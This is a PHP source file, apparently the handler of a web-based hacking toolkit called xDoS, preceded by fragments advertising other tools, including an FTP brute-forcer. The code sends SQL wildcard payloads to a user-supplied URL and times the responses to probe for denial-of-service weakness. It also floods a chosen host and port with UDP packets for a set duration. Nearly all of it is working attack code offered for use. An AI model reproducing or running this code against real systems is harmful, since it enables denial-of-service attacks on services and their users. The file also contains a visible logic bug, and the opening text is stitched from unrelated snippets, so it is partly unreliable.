..you how to make a multi bridge between THC_DO, THC_SS and THC_II and keep track of the output in realtime using iframes. So what exactly are we going to do? First of all if you don't..
AntiFTP uses wordlists in order to bruteforce FTP user accounts
<?php
/* Handler for xDoS
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 16-04-2015
*/
set_time_limit(0);
ignore_user_abort(true);
// set variable to be able to save a task
$_MODULE_C = "thc_xd";
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
if(isset($_POST['sVar'])){
/*
Attempt to see whether a script could be vulnerable to wildcard attacks.
For best results you should try this on a script that searches a huge amount of records.
More info: https://www.owasp.org/index.php/Testing_for_SQL_Wildcard_Attacks_%28OWASP-DS-001%29
*/
$aUrl = @parse_url($_POST['sUrl']);
if(!isset($aUrl['host']) || $aUrl['host']==""){
die(Screen($sOut."Invalid host or ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(!isset($aUrl['path']) || $aUrl['path']==""){
die(Screen($sOut."Invalid path to script".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(!isset($aUrl['query']) || $aUrl['query']==""){
die(Screen($sOut."Invalid query to poison".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_POST['sVar'] = trim($_POST['sVar']);
if(!preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
die(Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_POST['iDelay'] = intval(trim($_POST['iDelay']));
if($_POST['iDelay']<0){
// really funny, you should become a comedian or something..
$_POST['iDelay'] = 0;
}
$_POST['iCache'] = !isset($_POST['iCache']) ? 0 : 1;
if(!preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
die(Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// get is always default
$_POST['sMethod'] = @$_POST['sMethod']!="post" ? "GET" : "POST";
// create benchmark properties
$_CONTEXT['benchmarks'] = array();
$_CONTEXT['benchmarks']['test'] = array();
$_CONTEXT['benchmarks']['test']['payload'] = array();
$_CONTEXT['benchmarks']['test']['payload'][0] = "test1";
$_CONTEXT['benchmarks']['test']['payload'][1] = "test2";
$_CONTEXT['benchmarks']['test']['query'] = array();
$_CONTEXT['benchmarks']['test']['query'][0] = "";
$_CONTEXT['benchmarks']['test']['query'][1] = "";
$_CONTEXT['benchmarks']['test']['results'] = array();
$_CONTEXT['benchmarks']['wildcards'] = array();
$_CONTEXT['benchmarks']['wildcards']['payload'] = array();
$_CONTEXT['benchmarks']['wildcards']['payload'][0] = "'%64_[^!_%65/%ab?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
$_CONTEXT['benchmarks']['wildcards']['payload'][1] = "'%64_[^!_%65/%aa?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
$_CONTEXT['benchmarks']['wildcards']['query'] = array();
$_CONTEXT['benchmarks']['wildcards']['query'][0] = "";
$_CONTEXT['benchmarks']['wildcards']['query'][1] = "";
$_CONTEXT['benchmarks']['wildcards']['results'] = array();
// make sure the variable exists in the url
$aQuery = @explode("&",$aUrl['query']);
$bValid = false;
for($x=0;$x<count($aQuery);$x++){
// construct search queries
if($x!=0){
$_CONTEXT['benchmarks']['test']['query'][0] .= "&";
$_CONTEXT['benchmarks']['test']['query'][1] .= "&";
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "&";
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "&";
}
$aVarValue = explode("=",$aQuery[$x]);
$_CONTEXT['benchmarks']['test']['query'][0] .= $aVarValue[0];
$_CONTEXT['benchmarks']['test']['query'][1] .= $aVarValue[0];
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= $aVarValue[0];
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= $aVarValue[0];
if($aVarValue[0]==$_POST['sVar']){
$_CONTEXT['benchmarks']['test']['query'][0] .= "=".$_CONTEXT['benchmarks']['test']['payload'][0];
$_CONTEXT['benchmarks']['test']['query'][1] .= "=".$_CONTEXT['benchmarks']['test']['payload'][1];
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][0];
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][1];
$bValid = true;
}
}
if(!$bValid){
die(Screen($sOut."Invalid query, expecting variable name in url".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// looks valid from here, let's see if the host is up before we start benchmarking
echo Screen($sOut."<b>".($_POST['iCache']==1 ? "Caching is enabled, sending two different queries per query type" : "Both query types will be run two times")."</b><br /><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// host is up, start benchmarking
include_once($_PATHS['includes_root']."/task_start.php");
// every type of benchmark
foreach($_CONTEXT['benchmarks'] as $sType=>$aValues){
// amount of queries per benchmark
for($x=0;$x<2;$x++){
echo "<p><b>".$sType."</b> - sending ".strtolower($_POST['sMethod'])." request ".($x+1)." to ".$aUrl['host']." ...please wait.</p><blockquote>";
$iStart = microtime(true);
flush();
ob_flush();
$ch = curl_init();
if($_POST['sMethod']=="GET"){
curl_setopt($ch, CURLOPT_URL, $aUrl['scheme']."://".$aUrl['host'].$aUrl['path']."?".$_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==1 ? $x : 0)]);
}
else{
curl_setopt($ch, CURLOPT_URL, $aUrl['scheme']."://".$aUrl['host'].$aUrl['path']);
curl_setopt($ch, CURLOPT_POSTFIELDS, $_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==1 ? $x : 0)]);
}
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101506 Ubuntu/10.04 (lucid) Firefox/3.6.13 GTB7.1');
if(!$sResult = @curl_exec($ch)){
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
die(Screen("Can't get headers, are you sure the host is up?".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_CONTEXT['benchmarks'][$sType]['results'][] = microtime(true) - $iStart;
echo "<br />request completed in ".$_CONTEXT['benchmarks'][$sType]['results'][$x]." seconds<br/>";
@curl_close($ch);
if($_POST['iDelay']!=0){
echo "<br />waiting ".$_POST['iDelay']." second(s) for possible next request<br/>";
sleep($_POST['iDelay']);
}
echo"</blockquote>\n";
}
}
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
}
elseif(isset($_POST['iDuration'])){
/* sends udp packets to the specified host*/
echo $sOut;
$_POST['iDuration'] = @intval($_POST['iDuration']);
if($_POST['iDuration']<1){
die(Screen("Invalid duration of udp scan".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$sIP = @gethostbyname($_POST['sHost']);
$aIP = explode(".",$sIP);
if(count($aIP)!=4){
die(Screen("Failed to convert host to ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$iPort = @intval($_POST['iPort']);
if($iPort>0 && $iPort<65355){
include_once($_PATHS['module_default_root']."/poison.php");
}
else{
die(Screen("Invalid port number".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$iStart = time();
$iEnd = time()+$_POST['iDuration'];
$iScans = 1;
echo Screen("<p><b>initialising scan on host ".$sIP.":".$iPort."</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
include_once($_PATHS['includes_root']."/task_start.php");
while(true){
flush();
ob_flush();
$sPayload = Poison();
echo Screen("<br /><b>connection ".$iScans.":</b> sending ".strlen($sPayload)." bytes of data - ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
$fp = @fsockopen("udp://".$sIP,$iPort,$errno,$errstr,3);
@fwrite($fp,$sPayload);
echo Screen("<b>".($errstr=="" ? "completed" : $errstr)."</b>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
fclose($fp);
if(time()>=$iEnd){
echo Screen("<p><b>reached total scan duration (".$_POST['iDuration']." second(s)), aborting now...</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
break;
}
$iScans++;
}
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo $sEnd;
}
else{
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
?>